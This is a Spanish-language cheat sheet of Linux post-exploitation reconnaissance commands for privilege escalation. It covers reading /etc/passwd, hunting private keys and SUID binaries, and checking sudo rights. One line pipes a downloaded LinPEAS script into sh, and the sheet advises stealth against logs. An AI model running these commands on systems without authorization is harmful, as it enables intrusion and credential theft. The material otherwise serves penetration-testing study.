🕵️♂️ Reconocimiento Post-Explotación: Comandos Esenciales para Escalada de Privilegios
Objetivo
Una vez que obtuviste acceso inicial a un sistema (por ejemplo, una shell como usuario no privilegiado), el reconocimiento post-explotación es clave para entender el entorno, identificar vectores de escalada de privilegios y planificar los siguientes pasos.
📋 Tabla de Contenidos
- 1. Información de Usuario y Grupos
- 2. Información del Sistema y Kernel
- 3. Servicios y Procesos
- 4. Permisos y Archivos Interesantes
- 5. Sudo y SUID/SGID
- 6. Red y Conectividad
- 7. Herramientas Automatizadas
- 8. Tips y Buenas Prácticas
1. Información de Usuario y Grupos
# Ver usuario actual y grupos
whoami
id
groups
# Ver todos los usuarios del sistema
cat /etc/passwd
# Ver usuarios con shell válido
grep -vE 'nologin|false' /etc/passwd
# Ver usuarios con UID 0 (root)
awk -F: '($3 == "0") {print}' /etc/passwd¿Por qué es útil?
Saber tu usuario y grupos te permite identificar posibles permisos elevados (ej: docker, wheel, adm, lxd).
2. Información del Sistema y Kernel
# Versión del sistema operativo
cat /etc/os-release
lsb_release -a 2>/dev/null
# Versión del kernel
uname -a
cat /proc/version
# Arquitectura
arch
getconf LONG_BIT¿Por qué importa?
La versión del kernel y del SO te permite buscar exploits locales específicos (ej: Dirty COW, exploits de kernel antiguos).
3. Servicios y Procesos
# Ver procesos en ejecución
ps aux
ps -ef
# Ver servicios activos (systemd)
systemctl list-units --type=service --state=active
# Ver puertos abiertos y procesos asociados
netstat -tulpn 2>/dev/null
ss -tulpn 2>/dev/null
# Ver tareas programadas (cron)
crontab -l
ls -la /etc/cron*
cat /etc/crontab¿Por qué importa?
Procesos y servicios pueden revelar credenciales, scripts mal configurados o tareas cron explotables.
4. Permisos y Archivos Interesantes
# Buscar archivos SUID/SGID
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
# Buscar archivos y directorios con permisos de escritura global
find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null
# Buscar archivos de configuración sensibles
find /etc -name "*.conf" -o -name "*.bak" -o -name "*.old" 2>/dev/null
# Buscar archivos de contraseñas y claves
find / -name "*.pem" -o -name "*.key" -o -name "id_rsa*" 2>/dev/null¡Cuidado!
Archivos SUID/SGID y archivos de configuración mal protegidos son vectores clásicos de escalada.
5. Sudo y SUID/SGID
# Ver comandos sudo permitidos para el usuario actual
sudo -l
# Buscar binarios SUID interesantes
find / -perm -4000 -type f 2>/dev/null | grep -E 'bash|sh|python|perl|find|vim|nmap|cp|tar|less|more|nano|vi'
# Buscar binarios con capabilities
getcap -r / 2>/dev/null¿Por qué importa?
Sudoers mal configurados o binarios SUID pueden permitir ejecución de comandos como root.
6. Red y Conectividad
# Ver interfaces de red y direcciones IP
ip a
ifconfig 2>/dev/null
# Ver rutas de red
ip route
route -n
# Ver conexiones activas
netstat -antp
ss -antp
# Ver hosts conocidos
cat /etc/hosts
arp -a¿Por qué importa?
Saber la topología de red ayuda a planificar movimiento lateral o exfiltración.
7. Herramientas Automatizadas
Para reconocimiento y escalada más rápida, usá scripts como:
- LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh - LSE (Linux Smart Enumeration)
wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh chmod +x lse.sh ./lse.sh - Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh chmod +x linux-exploit-suggester.sh ./linux-exploit-suggester.sh
8. Tips y Buenas Prácticas
Consejos para un reconocimiento efectivo:
- Documentá todo: Guardá la salida de los comandos para análisis posterior.
- Priorizá la discreción: Usá comandos que no generen mucho ruido en logs.
- Buscá vectores clásicos: Sudoers, SUID, cronjobs, grupos especiales (docker, lxd, adm, wheel).
- Correlacioná información: Relacioná usuarios, servicios y archivos para encontrar rutas de escalada.
- Automatizá, pero verificá manualmente: Los scripts ayudan, pero siempre revisá los hallazgos críticos.
📊 Resumen Visual: Flujo de Reconocimiento Post-Explotación
flowchart TD A[Acceso inicial] --> B[Identificar usuario y grupos] B --> C[Recolectar info de sistema y kernel] C --> D[Enumerar servicios y procesos] D --> E[Buscar archivos y permisos peligrosos] E --> F[Analizar sudoers y SUID] F --> G[Explorar red y conectividad] G --> H[Ejecutar herramientas automáticas] H --> I[Escalada de privilegios]
¡Con estos comandos y técnicas, tendrás una base sólida para avanzar hacia la escalada de privilegios y el control total del sistema comprometido!